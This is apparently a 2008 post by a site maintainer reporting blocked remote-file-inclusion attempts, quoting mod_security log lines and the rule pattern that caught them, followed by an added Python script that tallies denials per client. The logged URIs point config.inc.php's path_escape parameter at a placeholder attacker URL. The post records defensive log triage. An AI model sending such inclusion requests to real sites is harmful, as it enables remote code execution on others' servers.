We are being flooded by hack attempts. Here is an excerpt of the access logs:
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php ?path_escape//////config.inc .php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape //////config.inc.php?path _escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php ?path_escape//////config.inc .php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape //////config.inc.php?path _escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php ?path_escape//////config.inc .php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape //////config.inc.php?path _escape=SOMEHACKERURL”]
It’s all coming from the same host, and I have a pretty good idea of what they are attempting… But I’m not sure if it’s an automated attack and I’m a random victim or it’s a personal attack against [YACG].
I will take care of this ASAP and let you guys know what this is all about…
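
A triage sketch for denial lines in the layout excerpted above, added here as an example and not part of the original post: it parses mod_security denials and groups them by client to measure how much of the flood comes from one host. The sample lines, IP addresses, hostname and URIs are constructed; only the rule id and message text are taken from the excerpt.

```python
import re
from collections import defaultdict
from datetime import datetime

HEAD = re.compile(r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] '
                  r'mod_security: Access denied with code (?P<code>\d+)')
# [key "value"] pairs; typographic quotes from blog rendering are accepted too.
FIELD = re.compile(r'\[(\w+) ["“”]([^"“”″]*)["“”″]\]')

def parse_line(line):
    """Return a dict for one mod_security denial line, or None for other lines."""
    m = HEAD.match(line)
    if not m:
        return None
    rec = dict(FIELD.findall(line))
    rec.update(client=m["client"], code=int(m["code"]),
               ts=datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"))
    return rec

def summarize(lines):
    """Group denials by client: hit count, rule ids, distinct URIs, timestamps."""
    out = defaultdict(lambda: {"hits": 0, "rules": set(), "uris": set(), "times": []})
    for rec in filter(None, map(parse_line, lines)):
        s = out[rec["client"]]
        s["hits"] += 1
        s["rules"].add(rec.get("id"))
        s["uris"].add(rec.get("uri"))
        s["times"].append(rec["ts"])
    return dict(out)

def top_source(summary):
    """Return (client, share of all denials) for the noisiest client."""
    total = sum(s["hits"] for s in summary.values())
    client = max(summary, key=lambda c: summary[c]["hits"], default=None)
    return client, (summary[client]["hits"] / total if client else 0.0)

# Constructed sample (documentation IPs, placeholder host and URIs), not real traffic.
_T = ('[Mon Jan 7 {t} 2008] [error] [client {ip}] mod_security: Access denied with code 503. '
      'Pattern match "PATTERN" at REQUEST_URI [id "HG2007072020"][rev "1"] '
      '[msg "HG: libwww UA with RFI"] [severity "NOTICE"] [hostname "example.test"] [uri "{uri}"]')
SAMPLE = [_T.format(t=t, ip=ip, uri=uri + "?path_escape=PLACEHOLDER") for t, ip, uri in [
    ("09:18:06", "192.0.2.10", "/support/config.inc.php"),
    ("09:18:06", "192.0.2.10", "/config.inc.php"),
    ("09:18:23", "192.0.2.10", "/support/config.inc.php"),
    ("09:30:39", "192.0.2.10", "/config.inc.php"),
    ("09:41:00", "198.51.100.7", "/config.inc.php"),
]] + ["[Mon Jan 7 09:42:00 2008] [error] [client 192.0.2.10] File does not exist: /var/www/x"]
if __name__ == "__main__":
    print(top_source(summarize(SAMPLE)))
```

A high share for one client, the same rule id on every hit and only a couple of distinct URIs repeated in bursts is the pattern to look for when deciding whether a single scanner is responsible.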
